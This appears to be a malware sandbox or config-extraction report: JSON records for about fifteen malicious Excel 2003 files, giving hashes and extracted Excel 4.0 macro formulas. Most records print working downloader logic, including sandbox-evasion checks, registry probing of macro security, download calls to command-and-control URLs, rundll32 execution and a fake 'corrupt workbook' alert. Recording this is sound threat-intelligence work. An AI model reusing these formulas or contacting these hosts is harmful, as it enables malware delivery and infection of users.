{"version":"0.2","sample":{"sample":"","kind":"file","target":"9152c85a8982604474799cb2142ccbd18ffabb4c8ec9f10e152eb042def73cc5"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"9152c85a8982604474799cb2142ccbd18ffabb4c8ec9f10e152eb042def73cc5","filesize":112128,"md5":"385609414c3acc82731e919bcd99be4a","sha1":"ba6e15669b9939f6e9cec1ef4d7fb9938911562c","sha256":"9152c85a8982604474799cb2142ccbd18ffabb4c8ec9f10e152eb042def73cc5","sha512":"aa77f2006adb5f52fa147d8e169f781e45511f43177f9589c30c41033b6bb77727aa1214f190c179caed136d15fad5b7227ebd6f2732151349bfe7961febfd58","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9152c85a8982604474799cb2142ccbd18ffabb4c8ec9f10e152eb042def73cc5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9172e28c984e9c47a5cf393995b218f6097f6596c3281ab3502a885203530516"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"9172e28c984e9c47a5cf393995b218f6097f6596c3281ab3502a885203530516","filesize":112128,"md5":"90897a6d358e41d4e2f1257ccd6a484b","sha1":"1160092749c2e7bf4132ecd4de6eeed834a3f3f8","sha256":"9172e28c984e9c47a5cf393995b218f6097f6596c3281ab3502a885203530516","sha512":"26f0046429b40fbd0cef3f916e69b338ff053e4df787cca9d6a725e7ac4e1f3b3c656e5be6d398183e662c97af31d842960b182e9efa8c2d9b03e46d80296da3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9172e28c984e9c47a5cf393995b218f6097f6596c3281ab3502a885203530516.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"917eac69ed372a466460e1400eaa87d061ea61e53ef6f7fcf20e0f9ef7585e62"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"917eac69ed372a466460e1400eaa87d061ea61e53ef6f7fcf20e0f9ef7585e62","filesize":167936,"md5":"c93c92e7c383355dcc78c309bf54755f","sha1":"6c1f24185c65d1b07f353db591e1a5e787329c99","sha256":"917eac69ed372a466460e1400eaa87d061ea61e53ef6f7fcf20e0f9ef7585e62","sha512":"43be551d333926fa267377af53db6b5660cfea48e4ebf054faaaa088fad84f4ba1d4be343981ff61898e885123c956e84e0c6cecb36ffe096723bfe68de1c11f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"917eac69ed372a466460e1400eaa87d061ea61e53ef6f7fcf20e0f9ef7585e62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"amOJWwZGE6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91812e311d6ff15636e796e067c7deeaed136c20f63f2d361d73b268d7f30059"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91812e311d6ff15636e796e067c7deeaed136c20f63f2d361d73b268d7f30059","filesize":209920,"md5":"0e4d5831253ae9de9b7616a540da75a4","sha1":"d4d5f842722d9e622c74fc026b0ee21707633355","sha256":"91812e311d6ff15636e796e067c7deeaed136c20f63f2d361d73b268d7f30059","sha512":"2cce732c636434da10da212eca659ea8cd99b036f8647c342025dc1b02913cf27b236388db30776b582c5eaa9acba1423401f7f1681934cdab5b5d58226dffde","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91812e311d6ff15636e796e067c7deeaed136c20f63f2d361d73b268d7f30059.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sRSUOOjQWb\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91958bdef3cfa1b1bc593eed4b1750b25d1229886ec53aa7184ffbee22ccf193"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91958bdef3cfa1b1bc593eed4b1750b25d1229886ec53aa7184ffbee22ccf193","filesize":214016,"md5":"f270c3970b4f529bb31e2e59abb539e5","sha1":"1ef132400a3ceb00b41a0765126d146c8d20f2c6","sha256":"91958bdef3cfa1b1bc593eed4b1750b25d1229886ec53aa7184ffbee22ccf193","sha512":"941f4604645cdc0f8b945b8a2ae040f59edde69979c4432bd01b08d05f10a08d71b05ec822ec445ae072c3d999bb7327dc1d758528646a858586ca9030da04fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91958bdef3cfa1b1bc593eed4b1750b25d1229886ec53aa7184ffbee22ccf193.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qiRlYJHsgi\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"919621fe91ce1fb07ad66fb2ac4b3f852ca70691115eba6dbb3415fa81ba7a1c"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"919621fe91ce1fb07ad66fb2ac4b3f852ca70691115eba6dbb3415fa81ba7a1c","filesize":185344,"md5":"6a49f66a5055513f8fe2606544a66064","sha1":"b34a992416e7ba6fb7324ec011c52d69ff6a2862","sha256":"919621fe91ce1fb07ad66fb2ac4b3f852ca70691115eba6dbb3415fa81ba7a1c","sha512":"a8c430b8fb62327e0f43a0401a5ec698e851d8abd017cecc3f5a1ded191c877be86759193332997c13c11068605fceb259a0ef9ad90cce0cf9e06237f7091f23","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"919621fe91ce1fb07ad66fb2ac4b3f852ca70691115eba6dbb3415fa81ba7a1c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91b70496e988ded244c1d0a76e2bf93a0cc0a9bac425ed06f7ecd81f97fcc97d"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91b70496e988ded244c1d0a76e2bf93a0cc0a9bac425ed06f7ecd81f97fcc97d","filesize":152576,"md5":"65f0eee98267ef58fb75300ded983b83","sha1":"5f334169caae6845d162fe6f74ef5bb83cebaa55","sha256":"91b70496e988ded244c1d0a76e2bf93a0cc0a9bac425ed06f7ecd81f97fcc97d","sha512":"e91154e4b77dd2f57145a4b84ec44fad3420515f85290b6bc9391e421d11cbf8b8445373aed675fd77c9e6c914e4bd1f3c32a7d89b962fd1f3a366aaafed9c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91b70496e988ded244c1d0a76e2bf93a0cc0a9bac425ed06f7ecd81f97fcc97d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KzzfVVR6q1\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91c16d959d6f907f294619dbf6b0835ec0f018ac56a1f84d55d96119551d0df2"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91c16d959d6f907f294619dbf6b0835ec0f018ac56a1f84d55d96119551d0df2","filesize":225280,"md5":"b03f1e57821459e97446b21ec57522a2","sha1":"97429efd8d00ab1a717ad650ecc6c392201a264e","sha256":"91c16d959d6f907f294619dbf6b0835ec0f018ac56a1f84d55d96119551d0df2","sha512":"2a960acde0b64b93ed33b137be314bbba02bc7e003b136c9ebac9721460ea572418f1136f13f3f7e0b6bdce3239eab03e357f9e0f81e2f1354d28d6091a0aab7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91c16d959d6f907f294619dbf6b0835ec0f018ac56a1f84d55d96119551d0df2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pZvLR6UuTA\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91c259ae4210565222b8c88e69c905f1a5f447e7490c6ab21904b37a2294b547"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91c259ae4210565222b8c88e69c905f1a5f447e7490c6ab21904b37a2294b547","filesize":141824,"md5":"485233ece796604834c3c6adae619a52","sha1":"2d8b3a281d1f20f9583ba2435b0c8d1109771f12","sha256":"91c259ae4210565222b8c88e69c905f1a5f447e7490c6ab21904b37a2294b547","sha512":"a7d30d07c9d7db15606361ac12653c702cf5aea26d106941e4f2561cdbad7789f1f9bb4453c9fd03d1c3cba054a9a817f97c7133febd04d7824012a173a15379","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91c259ae4210565222b8c88e69c905f1a5f447e7490c6ab21904b37a2294b547.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"HDSu6YsC98\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91ca9c9c46918b19bf33f77f48261eea3e2bd761672896d40e0b04ea43181559"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91ca9c9c46918b19bf33f77f48261eea3e2bd761672896d40e0b04ea43181559","filesize":144384,"md5":"20609d3ed0e32677d28acf7b8c5b2113","sha1":"a4cda3a250eab7e7dcf14785a6772f932d12a839","sha256":"91ca9c9c46918b19bf33f77f48261eea3e2bd761672896d40e0b04ea43181559","sha512":"91d0b9cdc1f2393de59386141235b6d52ff1066931d3f86c35ed22466b45a00d0d292fbb5369b48ec14e4ee014ae0992089c1da38f116e9ca9b1bee3e0094a65","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91ca9c9c46918b19bf33f77f48261eea3e2bd761672896d40e0b04ea43181559.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"5G3fDDLqNs\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91d1ab7d475251deb87cfb1f66ab94d3cbbc9d01aa5ffd7db10e715b60b47a57"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91d1ab7d475251deb87cfb1f66ab94d3cbbc9d01aa5ffd7db10e715b60b47a57","filesize":219136,"md5":"7c9436958933e0220c79297eedcef91f","sha1":"dbb30711a899e73c3769fc92cf1a5261f6697444","sha256":"91d1ab7d475251deb87cfb1f66ab94d3cbbc9d01aa5ffd7db10e715b60b47a57","sha512":"a19e398922852e659a2a5f85766c28bba11bb2e1622cfa785abb204311913341792d9221c105e875f463eaf103403718ae995fa5bc5e9fd8967f608c8cda6b99","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91d1ab7d475251deb87cfb1f66ab94d3cbbc9d01aa5ffd7db10e715b60b47a57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8VsJJuErel\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"91d26c75858fe8993d9dd5d17bfc9a22abc798f467ac43086f78799a3ea26e71"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"91d26c75858fe8993d9dd5d17bfc9a22abc798f467ac43086f78799a3ea26e71","filesize":225280,"md5":"9e38d9a61824ad0704fe986870304a50","sha1":"a7b9bd2369bca7399a040f46231366f64dfca238","sha256":"91d26c75858fe8993d9dd5d17bfc9a22abc798f467ac43086f78799a3ea26e71","sha512":"3ef8cf75802fcc06282d46c0a34893243f0a04b912a3853941944ed86de794a81ce3a041a4a6fe2426b34375f8a31fd88f2e6f876081391fee07722942a93b03","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"91d26c75858fe8993d9dd5d17bfc9a22abc798f467ac43086f78799a3ea26e71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZiYPpH3qyG\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9203764709fff30d91f39114ae83cd2b78fd7f94a2fa5db1aa97152852bc5c1b"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"9203764709fff30d91f39114ae83cd2b78fd7f94a2fa5db1aa97152852bc5c1b","filesize":185344,"md5":"1111eb2abc94d089ce9208e913401b58","sha1":"b5d38bc1f4ff6aa8575fe5f2a50cddad0228180e","sha256":"9203764709fff30d91f39114ae83cd2b78fd7f94a2fa5db1aa97152852bc5c1b","sha512":"7dda08d6d118f959a36ffaf5c3703767a82f44cae104f1b6f63a648e37f65d27d9680cc3d13463699576732cb6f315013d6b3b7fe7c2a9c64f391f4899745ea5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9203764709fff30d91f39114ae83cd2b78fd7f94a2fa5db1aa97152852bc5c1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"921b80335e1476c9b74d3e53acccd3c0fb91d69af79effcb9a60613fa1bc248c"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"921b80335e1476c9b74d3e53acccd3c0fb91d69af79effcb9a60613fa1bc248c","filesize":116224,"md5":"6ef49bb711f3cd69c084f5a3ebe65c7f","sha1":"290704c9b212062ca91011d5aa06305721744801","sha256":"921b80335e1476c9b74d3e53acccd3c0fb91d69af79effcb9a60613fa1bc248c","sha512":"fc627c8dc3a68837dfb5795fd3c0d30edf390db46ddf8cd2ebfaa4fb6531d799f77cb7c47756b8df38c0a6df7c27c8b7dc19415227b3ebc787136f07173ef59e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"921b80335e1476c9b74d3e53acccd3c0fb91d69af79effcb9a60613fa1bc248c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ruL6ZaIY0r\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"92547ccba3eb480e10c7630a6099ae2c50f4d7bc77491a6057e9e650360d165e"},"analysis":{"reported":"2020-04-09T16:17:43Z","score":10},"files":[{"filename":"92547ccba3eb480e10c7630a6099ae2c50f4d7bc77491a6057e9e650360d165e","filesize":167936,"md5":"a6c2ed9f4b4e70e15782c022f9d764d9","sha1":"e6b0134878215f4a6f97f463e6ab97b35c7ba921","sha256":"92547ccba3eb480e10c7630a6099ae2c50f4d7bc77491a6057e9e650360d165e","sha512":"03725d85af00b613a2fcd29b80a86a1fae4b0ce026cd23d7148c382ea787c4bd1d15eab0c5d36c0d91ab309aadd5eb1b9f99b73bd17d79b532a9b0190f6b3b96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"92547ccba3eb480e10c7630a6099ae2c50f4d7bc77491a6057e9e650360d165e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xAy4daZaMq\",TRUE)\nGOTO(R$0C$19)"}}}]}
